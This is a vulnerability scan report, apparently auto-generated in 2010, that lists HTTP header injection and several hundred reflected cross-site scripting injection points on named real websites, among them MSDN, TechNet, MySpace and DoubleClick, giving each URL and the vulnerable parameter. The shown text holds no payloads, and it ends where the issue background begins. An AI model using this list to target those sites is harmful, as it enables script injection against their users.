CWE-79, XSS, HTTP Header Injection, Capec-113, Example Report

Cross Site Scripting, HTTP Header Injection, Example Report for 12-11-2010 | CloudScan Vulnerability Crawler US Central 2

Report generated by XSS.CX at Sat Dec 11 15:13:56 CST 2010.


HTTP Header Injection, Cross Site Scripting, CWE-79, CWE-113

1. HTTP header injection

1.1. http://ad.doubleclick.net/ad/N4390.no_url_specifiedOX2495/B4882317.27 [REST URL parameter 1]

1.2. http://ad.doubleclick.net/adj/N5811.6393.MYSPACE/B5015899 [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

2.2. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

2.3. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 4]

2.4. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]

2.5. http://digg.com/submit [REST URL parameter 1]

2.6. http://events.nrf.com/annual2010/public/MainHall.aspx [exp parameter]

2.7. http://events.nrf.com/annual2010/public/MainHall.aspx [name of an arbitrarily supplied request parameter]

2.8. https://googleonline.webex.com/ec0605lb/eventcenter/recording/recordAction.do [REST URL parameter 1]

2.9. https://googleonline.webex.com/ec0605lb/eventcenter/recording/recordAction.do [REST URL parameter 2]

2.10. https://googleonline.webex.com/ec0605lb/eventcenter/recording/recordAction.do [REST URL parameter 3]

2.11. https://graph.facebook.com/oauth/authorize [REST URL parameter 2]

2.12. http://mike2.openmethodology.org/wiki/Fusing_Enterprise_Search_and_Social_Bookmarking [REST URL parameter 2]

2.13. http://msdn.microsoft.com/ [name of an arbitrarily supplied request parameter]

2.14. http://msdn.microsoft.com/cc300389.aspx [name of an arbitrarily supplied request parameter]

2.15. http://msdn.microsoft.com/en-us/library(d=loband [REST URL parameter 1]

2.16. http://msdn.microsoft.com/en-us/library/aa155072.aspx [REST URL parameter 1]

2.17. http://msdn.microsoft.com/en-us/library/aa155072.aspx [REST URL parameter 2]

2.18. http://msdn.microsoft.com/en-us/library/aa155072.aspx [REST URL parameter 3]

2.19. http://msdn.microsoft.com/en-us/library/aa155073.aspx [REST URL parameter 1]

2.20. http://msdn.microsoft.com/en-us/library/aa155073.aspx [REST URL parameter 2]

2.21. http://msdn.microsoft.com/en-us/library/aa155073.aspx [REST URL parameter 3]

2.22. http://msdn.microsoft.com/en-us/library/aa187916.aspx [REST URL parameter 1]

2.23. http://msdn.microsoft.com/en-us/library/aa187916.aspx [REST URL parameter 2]

2.24. http://msdn.microsoft.com/en-us/library/aa187916.aspx [REST URL parameter 3]

2.25. http://msdn.microsoft.com/en-us/library/bb726434(office.12 [REST URL parameter 1]

2.26. http://msdn.microsoft.com/en-us/library/bb726434(office.12 [REST URL parameter 2]

2.27. http://msdn.microsoft.com/en-us/library/bb726434(office.12 [REST URL parameter 3]

2.28. http://msdn.microsoft.com/en-us/library/bb726434(office.12).aspx [REST URL parameter 1]

2.29. http://msdn.microsoft.com/en-us/library/bb726434(office.12).aspx [REST URL parameter 2]

2.30. http://msdn.microsoft.com/en-us/library/bb726434(office.12).aspx [REST URL parameter 3]

2.31. http://msdn.microsoft.com/en-us/library/bb871518.aspx [REST URL parameter 1]

2.32. http://msdn.microsoft.com/en-us/library/bb871518.aspx [REST URL parameter 2]

2.33. http://msdn.microsoft.com/en-us/library/bb871518.aspx [REST URL parameter 3]

2.34. http://msdn.microsoft.com/en-us/library/bb871519.aspx [REST URL parameter 1]

2.35. http://msdn.microsoft.com/en-us/library/bb871519.aspx [REST URL parameter 2]

2.36. http://msdn.microsoft.com/en-us/library/bb871519.aspx [REST URL parameter 3]

2.37. http://msdn.microsoft.com/en-us/library/cc295789.aspx [REST URL parameter 1]

2.38. http://msdn.microsoft.com/en-us/library/cc295789.aspx [REST URL parameter 2]

2.39. http://msdn.microsoft.com/en-us/library/cc295789.aspx [REST URL parameter 3]

2.40. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10 [REST URL parameter 1]

2.41. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10 [REST URL parameter 2]

2.42. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10 [REST URL parameter 3]

2.43. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10).aspx [REST URL parameter 1]

2.44. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10).aspx [REST URL parameter 2]

2.45. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10).aspx [REST URL parameter 3]

2.46. http://msdn.microsoft.com/en-us/library/dd582937(office.11 [REST URL parameter 1]

2.47. http://msdn.microsoft.com/en-us/library/dd582937(office.11 [REST URL parameter 2]

2.48. http://msdn.microsoft.com/en-us/library/dd582937(office.11 [REST URL parameter 3]

2.49. http://msdn.microsoft.com/en-us/library/dd582937(office.11).aspx [REST URL parameter 1]

2.50. http://msdn.microsoft.com/en-us/library/dd582937(office.11).aspx [REST URL parameter 2]

2.51. http://msdn.microsoft.com/en-us/library/dd582937(office.11).aspx [REST URL parameter 3]

2.52. http://msdn.microsoft.com/en-us/library/dd582938(office.11 [REST URL parameter 1]

2.53. http://msdn.microsoft.com/en-us/library/dd582938(office.11 [REST URL parameter 2]

2.54. http://msdn.microsoft.com/en-us/library/dd582938(office.11 [REST URL parameter 3]

2.55. http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx [REST URL parameter 1]

2.56. http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx [REST URL parameter 2]

2.57. http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx [REST URL parameter 3]

2.58. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [REST URL parameter 1]

2.59. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [REST URL parameter 2]

2.60. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [REST URL parameter 3]

2.61. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [REST URL parameter 4]

2.62. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [name of an arbitrarily supplied request parameter]

2.63. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11 [REST URL parameter 1]

2.64. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11 [REST URL parameter 2]

2.65. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11 [REST URL parameter 3]

2.66. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11).aspx [REST URL parameter 1]

2.67. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11).aspx [REST URL parameter 2]

2.68. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11).aspx [REST URL parameter 3]

2.69. http://msdn.microsoft.com/en-us/library/dd582939(office.11 [REST URL parameter 1]

2.70. http://msdn.microsoft.com/en-us/library/dd582939(office.11 [REST URL parameter 2]

2.71. http://msdn.microsoft.com/en-us/library/dd582939(office.11 [REST URL parameter 3]

2.72. http://msdn.microsoft.com/en-us/library/dd582939(office.11).aspx [REST URL parameter 1]

2.73. http://msdn.microsoft.com/en-us/library/dd582939(office.11).aspx [REST URL parameter 2]

2.74. http://msdn.microsoft.com/en-us/library/dd582939(office.11).aspx [REST URL parameter 3]

2.75. http://msdn.microsoft.com/en-us/library/dd582940(office.11 [REST URL parameter 1]

2.76. http://msdn.microsoft.com/en-us/library/dd582940(office.11 [REST URL parameter 2]

2.77. http://msdn.microsoft.com/en-us/library/dd582940(office.11 [REST URL parameter 3]

2.78. http://msdn.microsoft.com/en-us/library/dd582940(office.11).aspx [REST URL parameter 1]

2.79. http://msdn.microsoft.com/en-us/library/dd582940(office.11).aspx [REST URL parameter 2]

2.80. http://msdn.microsoft.com/en-us/library/dd582940(office.11).aspx [REST URL parameter 3]

2.81. http://msdn.microsoft.com/en-us/library/default(loband).aspx [REST URL parameter 1]

2.82. http://msdn.microsoft.com/en-us/library/default(loband).aspx [REST URL parameter 2]

2.83. http://msdn.microsoft.com/en-us/library/default(loband).aspx [REST URL parameter 3]

2.84. http://msdn.microsoft.com/en-us/library/ee663300(VS.85 [REST URL parameter 1]

2.85. http://msdn.microsoft.com/en-us/library/ee663300(VS.85 [REST URL parameter 2]

2.86. http://msdn.microsoft.com/en-us/library/ee663300(VS.85 [REST URL parameter 3]

2.87. http://msdn.microsoft.com/en-us/library/ee663300(VS.85).aspx [REST URL parameter 1]

2.88. http://msdn.microsoft.com/en-us/library/ee663300(VS.85).aspx [REST URL parameter 2]

2.89. http://msdn.microsoft.com/en-us/library/ee663300(VS.85).aspx [REST URL parameter 3]

2.90. http://msdn.microsoft.com/en-us/library/ee702802.aspx [REST URL parameter 1]

2.91. http://msdn.microsoft.com/en-us/library/ee702802.aspx [REST URL parameter 2]

2.92. http://msdn.microsoft.com/en-us/library/ee702802.aspx [REST URL parameter 3]

2.93. http://msdn.microsoft.com/en-us/library/ee721044.aspx [REST URL parameter 1]

2.94. http://msdn.microsoft.com/en-us/library/ee721044.aspx [REST URL parameter 2]

2.95. http://msdn.microsoft.com/en-us/library/ee721044.aspx [REST URL parameter 3]

2.96. http://msdn.microsoft.com/en-us/library/ee725279.aspx [REST URL parameter 1]

2.97. http://msdn.microsoft.com/en-us/library/ee725279.aspx [REST URL parameter 2]

2.98. http://msdn.microsoft.com/en-us/library/ee725279.aspx [REST URL parameter 3]

2.99. http://msdn.microsoft.com/en-us/library/ff361664.aspx [REST URL parameter 1]

2.100. http://msdn.microsoft.com/en-us/library/ff361664.aspx [REST URL parameter 2]

2.101. http://msdn.microsoft.com/en-us/library/ff361664.aspx [REST URL parameter 3]

2.102. http://msdn.microsoft.com/en-us/library/ff921345.aspx [REST URL parameter 1]

2.103. http://msdn.microsoft.com/en-us/library/ff921345.aspx [REST URL parameter 2]

2.104. http://msdn.microsoft.com/en-us/library/ff921345.aspx [REST URL parameter 3]

2.105. http://msdn.microsoft.com/en-us/library/ms123401.aspx [REST URL parameter 1]

2.106. http://msdn.microsoft.com/en-us/library/ms123401.aspx [REST URL parameter 2]

2.107. http://msdn.microsoft.com/en-us/library/ms123401.aspx [REST URL parameter 3]

2.108. http://msdn.microsoft.com/en-us/library/ms376734.aspx [REST URL parameter 1]

2.109. http://msdn.microsoft.com/en-us/library/ms376734.aspx [REST URL parameter 2]

2.110. http://msdn.microsoft.com/en-us/library/ms376734.aspx [REST URL parameter 3]

2.111. http://msdn.microsoft.com/en-us/library/ms689718(VS.85 [REST URL parameter 1]

2.112. http://msdn.microsoft.com/en-us/library/ms689718(VS.85 [REST URL parameter 2]

2.113. http://msdn.microsoft.com/en-us/library/ms689718(VS.85 [REST URL parameter 3]

2.114. http://msdn.microsoft.com/en-us/library/ms689718(VS.85).aspx [REST URL parameter 1]

2.115. http://msdn.microsoft.com/en-us/library/ms689718(VS.85).aspx [REST URL parameter 2]

2.116. http://msdn.microsoft.com/en-us/library/ms689718(VS.85).aspx [REST URL parameter 3]

2.117. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85 [REST URL parameter 1]

2.118. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85 [REST URL parameter 2]

2.119. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85 [REST URL parameter 3]

2.120. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85).aspx [REST URL parameter 1]

2.121. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85).aspx [REST URL parameter 2]

2.122. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85).aspx [REST URL parameter 3]

2.123. http://msdn.microsoft.com/en-us/library/ms690384(VS.85).aspx [REST URL parameter 1]

2.124. http://msdn.microsoft.com/en-us/library/ms690384(VS.85).aspx [REST URL parameter 2]

2.125. http://msdn.microsoft.com/en-us/library/ms690384(VS.85).aspx [REST URL parameter 3]

2.126. http://msdn.microsoft.com/en-us/library/ms691105(VS.85).aspx [REST URL parameter 1]

2.127. http://msdn.microsoft.com/en-us/library/ms691105(VS.85).aspx [REST URL parameter 2]

2.128. http://msdn.microsoft.com/en-us/library/ms691105(VS.85).aspx [REST URL parameter 3]

2.129. http://msdn.microsoft.com/en-us/library/ms951681.aspx [REST URL parameter 1]

2.130. http://msdn.microsoft.com/en-us/library/ms951681.aspx [REST URL parameter 2]

2.131. http://msdn.microsoft.com/en-us/library/ms951681.aspx [REST URL parameter 3]

2.132. http://msdn.microsoft.com/en-us/ms348103.aspx [name of an arbitrarily supplied request parameter]

2.133. http://myspace.videosurf.com/video/brittany-mae-smith-surveillance-footage-1247969138 [REST URL parameter 2]

2.134. http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256 [REST URL parameter 2]

2.135. http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256 [name of an arbitrarily supplied request parameter]

2.136. http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256 [vlt parameter]

2.137. http://myspace.videosurf.com/video/saved-by-the-belding-1247850355 [REST URL parameter 2]

2.138. http://myspace.videosurf.com/video/saved-by-the-belding-1247850355 [name of an arbitrarily supplied request parameter]

2.139. http://myspace.videosurf.com/video/saved-by-the-belding-1247850355 [vlt parameter]

2.140. http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079 [REST URL parameter 2]

2.141. http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079 [name of an arbitrarily supplied request parameter]

2.142. http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079 [vlt parameter]

2.143. http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528 [REST URL parameter 2]

2.144. http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528 [name of an arbitrarily supplied request parameter]

2.145. http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528 [vlt parameter]

2.146. http://myspace.videosurf.com/videos/' [REST URL parameter 1]

2.147. http://myspace.videosurf.com/videos/' [REST URL parameter 2]

2.148. http://myspace.videosurf.com/videos/' [name of an arbitrarily supplied request parameter]

2.149. http://network.videosurf.com/beacon/people_search/myspace [REST URL parameter 1]

2.150. http://programs.lucidimagination.com/AW-WP-LS4ES.html [sc parameter]

2.151. http://programs.lucidimagination.com/AW-WP-Starting.html [sc parameter]

2.152. https://secure.shareit.com/shareit/cart.html [name of an arbitrarily supplied request parameter]

2.153. https://secure.shareit.com/shareit/product.html [name of an arbitrarily supplied request parameter]

2.154. http://technet.microsoft.com/en-us/library/aa991542.aspx [REST URL parameter 1]

2.155. http://technet.microsoft.com/en-us/library/aa991542.aspx [REST URL parameter 2]

2.156. http://technet.microsoft.com/en-us/library/aa991542.aspx [REST URL parameter 3]

2.157. http://technet.microsoft.com/en-us/library/bb625087.aspx [REST URL parameter 1]

2.158. http://technet.microsoft.com/en-us/library/bb625087.aspx [REST URL parameter 2]

2.159. http://technet.microsoft.com/en-us/library/bb625087.aspx [REST URL parameter 3]

2.160. http://technet.microsoft.com/en-us/library/bb726976.aspx [REST URL parameter 1]

2.161. http://technet.microsoft.com/en-us/library/bb726976.aspx [REST URL parameter 2]

2.162. http://technet.microsoft.com/en-us/library/bb726976.aspx [REST URL parameter 3]

2.163. http://technet.microsoft.com/en-us/library/bb727024.aspx [REST URL parameter 1]

2.164. http://technet.microsoft.com/en-us/library/bb727024.aspx [REST URL parameter 2]

2.165. http://technet.microsoft.com/en-us/library/bb727024.aspx [REST URL parameter 3]

2.166. http://technet.microsoft.com/en-us/library/bb727026.aspx [REST URL parameter 1]

2.167. http://technet.microsoft.com/en-us/library/bb727026.aspx [REST URL parameter 2]

2.168. http://technet.microsoft.com/en-us/library/bb727026.aspx [REST URL parameter 3]

2.169. http://technet.microsoft.com/en-us/library/bb727028.aspx [REST URL parameter 1]

2.170. http://technet.microsoft.com/en-us/library/bb727028.aspx [REST URL parameter 2]

2.171. http://technet.microsoft.com/en-us/library/bb727028.aspx [REST URL parameter 3]

2.172. http://technet.microsoft.com/en-us/library/bb727030.aspx [REST URL parameter 1]

2.173. http://technet.microsoft.com/en-us/library/bb727030.aspx [REST URL parameter 2]

2.174. http://technet.microsoft.com/en-us/library/bb727030.aspx [REST URL parameter 3]

2.175. http://technet.microsoft.com/en-us/library/bb727032.aspx [REST URL parameter 1]

2.176. http://technet.microsoft.com/en-us/library/bb727032.aspx [REST URL parameter 2]

2.177. http://technet.microsoft.com/en-us/library/bb727032.aspx [REST URL parameter 3]

2.178. http://technet.microsoft.com/en-us/library/bb727034.aspx [REST URL parameter 1]

2.179. http://technet.microsoft.com/en-us/library/bb727034.aspx [REST URL parameter 2]

2.180. http://technet.microsoft.com/en-us/library/bb727034.aspx [REST URL parameter 3]

2.181. http://technet.microsoft.com/en-us/library/bb727042.aspx [REST URL parameter 1]

2.182. http://technet.microsoft.com/en-us/library/bb727042.aspx [REST URL parameter 2]

2.183. http://technet.microsoft.com/en-us/library/bb727042.aspx [REST URL parameter 3]

2.184. http://technet.microsoft.com/en-us/library/bb727044.aspx [REST URL parameter 1]

2.185. http://technet.microsoft.com/en-us/library/bb727044.aspx [REST URL parameter 2]

2.186. http://technet.microsoft.com/en-us/library/bb727044.aspx [REST URL parameter 3]

2.187. http://technet.microsoft.com/en-us/library/bb727046.aspx [REST URL parameter 1]

2.188. http://technet.microsoft.com/en-us/library/bb727046.aspx [REST URL parameter 2]

2.189. http://technet.microsoft.com/en-us/library/bb727046.aspx [REST URL parameter 3]

2.190. http://technet.microsoft.com/en-us/library/bb727048.aspx [REST URL parameter 1]

2.191. http://technet.microsoft.com/en-us/library/bb727048.aspx [REST URL parameter 2]

2.192. http://technet.microsoft.com/en-us/library/bb727050.aspx [REST URL parameter 1]

2.193. http://technet.microsoft.com/en-us/library/bb727052.aspx [REST URL parameter 1]

2.194. http://technet.microsoft.com/en-us/library/bb727054.aspx [REST URL parameter 1]

2.195. http://technet.microsoft.com/en-us/library/bb727063.aspx [REST URL parameter 1]

2.196. http://technet.microsoft.com/en-us/library/bb727063.aspx [REST URL parameter 2]

2.197. http://technet.microsoft.com/en-us/library/bb727063.aspx [REST URL parameter 3]

2.198. http://technet.microsoft.com/en-us/library/bb727064.aspx [REST URL parameter 1]

2.199. http://technet.microsoft.com/en-us/library/bb727064.aspx [REST URL parameter 2]

2.200. http://technet.microsoft.com/en-us/library/bb727064.aspx [REST URL parameter 3]

2.201. http://technet.microsoft.com/en-us/library/bb727067.aspx [REST URL parameter 1]

2.202. http://technet.microsoft.com/en-us/library/bb727067.aspx [REST URL parameter 2]

2.203. http://technet.microsoft.com/en-us/library/bb727067.aspx [REST URL parameter 3]

2.204. http://technet.microsoft.com/en-us/library/bb727069.aspx [REST URL parameter 1]

2.205. http://technet.microsoft.com/en-us/library/bb727070.aspx [REST URL parameter 1]

2.206. http://technet.microsoft.com/en-us/library/bb727070.aspx [REST URL parameter 2]

2.207. http://technet.microsoft.com/en-us/library/bb727070.aspx [REST URL parameter 3]

2.208. http://technet.microsoft.com/en-us/library/bb727085.aspx [REST URL parameter 1]

2.209. http://technet.microsoft.com/en-us/library/bb727085.aspx [REST URL parameter 2]

2.210. http://technet.microsoft.com/en-us/library/bb727085.aspx [REST URL parameter 3]

2.211. http://technet.microsoft.com/en-us/library/bb727091.aspx [REST URL parameter 1]

2.212. http://technet.microsoft.com/en-us/library/bb727091.aspx [REST URL parameter 2]

2.213. http://technet.microsoft.com/en-us/library/bb727091.aspx [REST URL parameter 3]

2.214. http://technet.microsoft.com/en-us/library/bb727099.aspx [REST URL parameter 1]

2.215. http://technet.microsoft.com/en-us/library/bb727099.aspx [REST URL parameter 2]

2.216. http://technet.microsoft.com/en-us/library/bb727099.aspx [REST URL parameter 3]

2.217. http://technet.microsoft.com/en-us/library/bb727159.aspx [REST URL parameter 1]

2.218. http://technet.microsoft.com/en-us/library/bb727159.aspx [REST URL parameter 2]

2.219. http://technet.microsoft.com/en-us/library/bb727159.aspx [REST URL parameter 3]

2.220. http://technet.microsoft.com/en-us/library/bb727169.aspx [REST URL parameter 1]

2.221. http://technet.microsoft.com/en-us/library/bb727169.aspx [REST URL parameter 2]

2.222. http://technet.microsoft.com/en-us/library/bb727169.aspx [REST URL parameter 3]

2.223. http://technet.microsoft.com/en-us/library/bb742437.aspx [REST URL parameter 1]

2.224. http://technet.microsoft.com/en-us/library/bb742437.aspx [REST URL parameter 2]

2.225. http://technet.microsoft.com/en-us/library/bb742437.aspx [REST URL parameter 3]

2.226. http://technet.microsoft.com/en-us/library/bb742438.aspx [REST URL parameter 1]

2.227. http://technet.microsoft.com/en-us/library/bb742438.aspx [REST URL parameter 2]

2.228. http://technet.microsoft.com/en-us/library/bb742438.aspx [REST URL parameter 3]

2.229. http://technet.microsoft.com/en-us/library/bb742457.aspx [REST URL parameter 1]

2.230. http://technet.microsoft.com/en-us/library/bb742457.aspx [REST URL parameter 2]

2.231. http://technet.microsoft.com/en-us/library/bb742457.aspx [REST URL parameter 3]

2.232. http://technet.microsoft.com/en-us/library/bb742548.aspx [REST URL parameter 1]

2.233. http://technet.microsoft.com/en-us/library/bb742548.aspx [REST URL parameter 2]

2.234. http://technet.microsoft.com/en-us/library/bb742548.aspx [REST URL parameter 3]

2.235. http://technet.microsoft.com/en-us/library/bb742578.aspx [REST URL parameter 1]

2.236. http://technet.microsoft.com/en-us/library/bb742578.aspx [REST URL parameter 2]

2.237. http://technet.microsoft.com/en-us/library/bb742578.aspx [REST URL parameter 3]

2.238. http://technet.microsoft.com/en-us/library/bb742583.aspx [REST URL parameter 1]

2.239. http://technet.microsoft.com/en-us/library/bb742583.aspx [REST URL parameter 2]

2.240. http://technet.microsoft.com/en-us/library/bb742583.aspx [REST URL parameter 3]

2.241. http://technet.microsoft.com/en-us/library/default(loband).aspx [REST URL parameter 1]

2.242. http://technet.microsoft.com/en-us/library/default(loband).aspx [REST URL parameter 2]

2.243. http://technet.microsoft.com/en-us/library/default(loband).aspx [REST URL parameter 3]

2.244. http://thedailyreviewer.com/tags/alphabetical/a [REST URL parameter 3]

2.245. http://thedailyreviewer.com/tags/alphabetical/b [REST URL parameter 3]

2.246. http://thedailyreviewer.com/tags/alphabetical/c [REST URL parameter 3]

2.247. http://thedailyreviewer.com/tags/alphabetical/d [REST URL parameter 3]

2.248. http://thedailyreviewer.com/tags/alphabetical/e [REST URL parameter 3]

2.249. http://thedailyreviewer.com/tags/alphabetical/f [REST URL parameter 3]

2.250. http://thedailyreviewer.com/tags/alphabetical/g [REST URL parameter 3]

2.251. http://thedailyreviewer.com/tags/alphabetical/h [REST URL parameter 3]

2.252. http://thedailyreviewer.com/tags/alphabetical/i [REST URL parameter 3]

2.253. http://thedailyreviewer.com/tags/alphabetical/j [REST URL parameter 3]

2.254. http://thedailyreviewer.com/tags/alphabetical/k [REST URL parameter 3]

2.255. http://thedailyreviewer.com/tags/alphabetical/l [REST URL parameter 3]

2.256. http://thedailyreviewer.com/tags/alphabetical/m [REST URL parameter 3]

2.257. http://thedailyreviewer.com/tags/alphabetical/n [REST URL parameter 3]

2.258. http://thedailyreviewer.com/tags/alphabetical/o [REST URL parameter 3]

2.259. http://thedailyreviewer.com/tags/alphabetical/p [REST URL parameter 3]

2.260. http://thedailyreviewer.com/tags/alphabetical/q [REST URL parameter 3]

2.261. http://thedailyreviewer.com/tags/alphabetical/r [REST URL parameter 3]

2.262. http://thedailyreviewer.com/tags/alphabetical/s [REST URL parameter 3]

2.263. http://thedailyreviewer.com/tags/alphabetical/t [REST URL parameter 3]

2.264. http://thedailyreviewer.com/tags/alphabetical/u [REST URL parameter 3]

2.265. http://thedailyreviewer.com/tags/alphabetical/v [REST URL parameter 3]

2.266. http://thedailyreviewer.com/tags/alphabetical/w [REST URL parameter 3]

2.267. http://thedailyreviewer.com/tags/alphabetical/x [REST URL parameter 3]

2.268. http://thedailyreviewer.com/tags/alphabetical/y [REST URL parameter 3]

2.269. http://thedailyreviewer.com/tags/alphabetical/z [REST URL parameter 3]

2.270. http://thedailyreviewer.com/top/baseball [REST URL parameter 2]

2.271. http://thedailyreviewer.com/top/baseball [REST URL parameter 2]

2.272. http://thedailyreviewer.com/top/breaking-news [REST URL parameter 2]

2.273. http://thedailyreviewer.com/top/breaking-news [REST URL parameter 2]

2.274. http://thedailyreviewer.com/top/business [REST URL parameter 2]

2.275. http://thedailyreviewer.com/top/business [REST URL parameter 2]

2.276. http://thedailyreviewer.com/top/celebrities [REST URL parameter 2]

2.277. http://thedailyreviewer.com/top/celebrities [REST URL parameter 2]

2.278. http://thedailyreviewer.com/top/economy [REST URL parameter 2]

2.279. http://thedailyreviewer.com/top/economy [REST URL parameter 2]

2.280. http://thedailyreviewer.com/top/entertainment [REST URL parameter 2]

2.281. http://thedailyreviewer.com/top/entertainment [REST URL parameter 2]

2.282. http://thedailyreviewer.com/top/finance [REST URL parameter 2]

2.283. http://thedailyreviewer.com/top/finance [REST URL parameter 2]

2.284. http://thedailyreviewer.com/top/gadgets [REST URL parameter 2]

2.285. http://thedailyreviewer.com/top/gadgets [REST URL parameter 2]

2.286. http://thedailyreviewer.com/top/health [REST URL parameter 2]

2.287. http://thedailyreviewer.com/top/health [REST URL parameter 2]

2.288. http://thedailyreviewer.com/top/movies [REST URL parameter 2]

2.289. http://thedailyreviewer.com/top/movies [REST URL parameter 2]

2.290. http://thedailyreviewer.com/top/music [REST URL parameter 2]

2.291. http://thedailyreviewer.com/top/music [REST URL parameter 2]

2.292. http://thedailyreviewer.com/top/nba-basketball [REST URL parameter 2]

2.293. http://thedailyreviewer.com/top/nba-basketball [REST URL parameter 2]

2.294. http://thedailyreviewer.com/top/nfl-football [REST URL parameter 2]

2.295. http://thedailyreviewer.com/top/nfl-football [REST URL parameter 2]

2.296. http://thedailyreviewer.com/top/politics [REST URL parameter 2]

2.297. http://thedailyreviewer.com/top/politics [REST URL parameter 2]

2.298. http://thedailyreviewer.com/top/real-estate [REST URL parameter 2]

2.299. http://thedailyreviewer.com/top/real-estate [REST URL parameter 2]

2.300. http://thedailyreviewer.com/top/regional-news [REST URL parameter 2]

2.301. http://thedailyreviewer.com/top/regional-news [REST URL parameter 2]

2.302. http://thedailyreviewer.com/top/science [REST URL parameter 2]

2.303. http://thedailyreviewer.com/top/science [REST URL parameter 2]

2.304. http://thedailyreviewer.com/top/soccer [REST URL parameter 2]

2.305. http://thedailyreviewer.com/top/soccer [REST URL parameter 2]

2.306. http://thedailyreviewer.com/top/sports [REST URL parameter 2]

2.307. http://thedailyreviewer.com/top/sports [REST URL parameter 2]

2.308. http://thedailyreviewer.com/top/stocks [REST URL parameter 2]

2.309. http://thedailyreviewer.com/top/stocks [REST URL parameter 2]

2.310. http://thedailyreviewer.com/top/technology [REST URL parameter 2]

2.311. http://thedailyreviewer.com/top/technology [REST URL parameter 2]

2.312. http://thedailyreviewer.com/top/tv [REST URL parameter 2]

2.313. http://thedailyreviewer.com/top/tv [REST URL parameter 2]

2.314. http://thedailyreviewer.com/top/world-news [REST URL parameter 2]

2.315. http://thedailyreviewer.com/top/world-news [REST URL parameter 2]

2.316. http://video.webcasts.com/events/pmny001/viewer/index.jsp [eventid parameter]

2.317. http://www.alumni.uga.edu/alumni/phpsearch/search.php [name of an arbitrarily supplied request parameter]

2.318. http://www.ancestry.com/search/rectype/default.aspx [rt parameter]

2.319. http://www.casey.vic.gov.au/search/search.asp [name of an arbitrarily supplied request parameter]

2.320. http://www.casey.vic.gov.au/search/search.asp [name of an arbitrarily supplied request parameter]

2.321. http://www.coveo.com/en/search [name of an arbitrarily supplied request parameter]

2.322. http://www.coveo.com/search [name of an arbitrarily supplied request parameter]

2.323. http://www.myspace.com/search/people [name of an arbitrarily supplied request parameter]

2.324. http://www.orange.md/ [name of an arbitrarily supplied request parameter]

2.325. http://www.recover.ie/search.php [name of an arbitrarily supplied request parameter]

2.326. http://www.uniquecarsandparts.com.au/search.php [name of an arbitrarily supplied request parameter]

2.327. http://www.usmd.edu/search/index.php [REST URL parameter 1]

2.328. http://www.usmd.edu/search/index.php [REST URL parameter 1]

2.329. http://www.usmd.edu/search/index.php [REST URL parameter 1]

2.330. http://www.usmd.edu/search/index.php [REST URL parameter 2]

2.331. http://www.usmd.edu/search/index.php [REST URL parameter 2]

2.332. http://api.myspace.com/-/opensearch/extensions/1.0/ [Referer HTTP header]

2.333. http://duckduckgo.com/x22 [Referer HTTP header]

2.334. https://secure.shareit.com/shareit/cart.html [Referer HTTP header]

2.335. https://secure.shareit.com/shareit/cart.html [Referer HTTP header]

2.336. http://www.mobythreads.com/Search-Engine-ftopict7472.html/x26amp [Referer HTTP header]

2.337. http://www.mobythreads.com/component-add-remove-ftopict7049.html/x26amp [Referer HTTP header]

2.338. http://www.t-mobile.com/shop/Phones/cell-phone-detail.aspx [User-Agent HTTP header]

2.339. http://myspace.com/ [name of an arbitrarily supplied request parameter]

2.340. http://searchservice.myspace.com/index.cfm [d parameter]

2.341. http://searchservice.myspace.com/index.cfm [fuseaction parameter]

2.342. http://searchservice.myspace.com/index.cfm [g parameter]

2.343. http://searchservice.myspace.com/index.cfm [loc parameter]

2.344. http://searchservice.myspace.com/index.cfm [maxAge parameter]

2.345. http://searchservice.myspace.com/index.cfm [minAge parameter]

2.346. http://searchservice.myspace.com/index.cfm [name of an arbitrarily supplied request parameter]

2.347. http://searchservice.myspace.com/index.cfm [npic parameter]

2.348. http://searchservice.myspace.com/index.cfm [pg parameter]

2.349. http://searchservice.myspace.com/index.cfm [qry parameter]

2.350. http://searchservice.myspace.com/index.cfm [type parameter]

2.351. http://seg.sharethis.com/getSegment.php [__stid cookie]



1. HTTP header injection
There are 2 instances of this issue:

Issue background

